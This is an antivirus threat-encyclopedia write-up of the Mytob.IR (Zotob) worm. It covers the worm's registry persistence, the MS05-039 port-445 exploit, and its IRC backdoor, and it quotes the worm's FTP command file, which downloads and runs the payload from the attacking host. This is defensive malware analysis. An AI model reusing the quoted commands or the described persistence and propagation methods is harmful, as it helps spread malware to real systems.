Threat Encyclopedia

Selected viruses, spyware, and other threats: sorted alphabetically


Aliases: W32/Zotob.worm.b, W32/Zotob.B, W32/Zotob-B
Type: Worm
Affect: Windows 2000

Mytob.IR is a 15386 bytes worm that is runtime packedd by UPack. Upon execution, the worm copies itself into the System32 folder as "csm.exe".
The worm creates a mutex "B-O-T-Z-O-R" to avoid multiple running instances of the worm on one machine.

The worm adds the following registry key to the registry to make sure that it runs every time windows is started:

"csm Win Updates" = "csm.exe"

"csm Win Updates" = "csm.exe"

Note: The worm watches continuously for the presence of these registry keys and recreates them if they are not present.

MyTob.IR also modifies the following registry key:

"Start" = "4"

Changing this key lowers security settings on the compromised system.

Note: This will disable the Shared Access on Windows NT based systems.

The worm generates random IP addresses and attempts to connect on port 445 of the generated IP's to exploit the Plug and Play buffer overflow vulnerability [see MS05-039 at]. If the vulnerability exploit is successful, it executes code (shellcode) on the target machine, which instructs it to connect back to the source in order to retrieve a copy of the worm. (This copy is uploaded to the target machine by the created FTP Server-Connection using 2pac.txt FTP-Commands file)

Note: The worm creates a own task "SCAN" for this purpose.

The 2pac.txt file contains the following ftp commands:

open %IP% %TCP port%
user hell rulez
get haha.exe

The worm executes FTP.EXE locally on the compromised system to retrieve a copy of the worm with the name "haha.exe" from the connecting system, and starts this file after downloading.

Note: The FTP Server is using port 33333

The worm attempts to overwrite the hosts file with the following data to prevent access to these sites:

The worm also provides IRC-Backdoor functionality with the following functions:

Downloading files
Downloading new worm updates
Executing files
Providing uptime information to the remote controller
Providing information about the worm variant to the remote controller
Notifying IRC Channels/Operator via private message
Restarting the computer
Providing FTP Server Access on the compromised system
Removing components

The worm also contains the following text:

.... Made By .... Greetz to good friend ..... Based On ....
MSG to avs: the first av who detect this worm will be the first killed in the next 24hours!!!

It tries to connect to the irc server

History: Analysis and Write-up by: Michael St. Neitzel